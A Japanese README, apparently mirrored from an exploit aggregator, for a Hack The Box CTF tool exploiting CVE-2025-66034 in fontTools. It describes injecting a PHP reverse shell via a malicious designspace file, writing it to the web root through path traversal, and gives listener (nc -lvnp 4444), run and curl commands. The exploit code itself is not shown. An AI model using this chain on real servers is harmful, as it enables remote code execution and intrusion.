## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-JWSLY12-CVE-2025-66034-HTB-CTF
# CVE-2025-66034-htb-ctf
# VariaType 可変フォント生成エクスプロイト
このリポジトリには、Hack The Box の **VariaType** マシン向けの特化型エクスプロイトが含まれています。このエクスプロイトは、`fontTools` ライブラリまたは Web アプリケーションが `.designspace` XML ファイルとメタデータの補間を処理する方法における脆弱性を悪用して、**リモートコード実行 (RCE)** を達成します。
## 📝 説明
脆弱性はフォント生成プロセスに存在します。悪意のある `designspace` ファイルを細工することで、PHP リバースシェルのペイロードをフォントのメタデータ(具体的には `<labelname>` フィールド)に注入できます。サーバーがこれらのファイルを処理して可変フォントを生成すると、出力がユーザー定義のパスに書き込まれるため、Web ルートに `.php` シェルを配置できます。
## 🛠️ 特徴
* **自動フォント生成** : `fontTools` を使用して、有効な `source-light.ttf` および `source-regular.ttf` マスターフォントを作成します。
* **XML インジェクション** : CDATA でラップされた PHP ペイロードを含む悪意のある `designspace` ファイルを生成します。
* **パストラバーサル / 任意ファイル書き込み** : 生成された「フォント」を `.php` ファイルとして公開ディレクトリに保存しようとします。
* **ランダム化** : 競合を避けるために一意のシェル名を生成します。
## 🚀 要件
Python 3 と以下のライブラリがインストールされている必要があります:
root@kitploit:~
pip install fontTools requests
## 💻 使用方法
### 1\. リスナーを起動する
ローカルマシン(または Pwnbox)で Netcat リスナーを起動します:
root@kitploit:~
nc -lvnp 4444
### 2\. エクスプロイトを実行する
HTB VPN IP とリスナーポートを指定してスクリプトを実行します:
root@kitploit:~
python3 exploit.py --ip <YOUR_IP> --port 4444
### 3\. シェルを起動する
アップロードが `200 OK` を返した場合(エラー前に処理が行われると `500` を返すこともあります)、スクリプトがファイル名を表示します。`curl` またはブラウザでアクセスしてください:
root@kitploit:~
curl http://portal.variatype.htb/shell_xxxxxx.php
## ⚙️ 引数
## ⚠️ 免責事項
このスクリプトは、教育目的および許可されたペネトレーションテスト専用です。事前の許可なしにターゲットへアクセスまたは攻撃することは違法です。
* * *
### この README の使用方法:
1. 上記の内容を `README.md` としてスクリプトと同じフォルダに保存します。
2. スクリプトの名前が `exploit.py` であることを確認するか、上記のコマンド内のファイル名を更新します。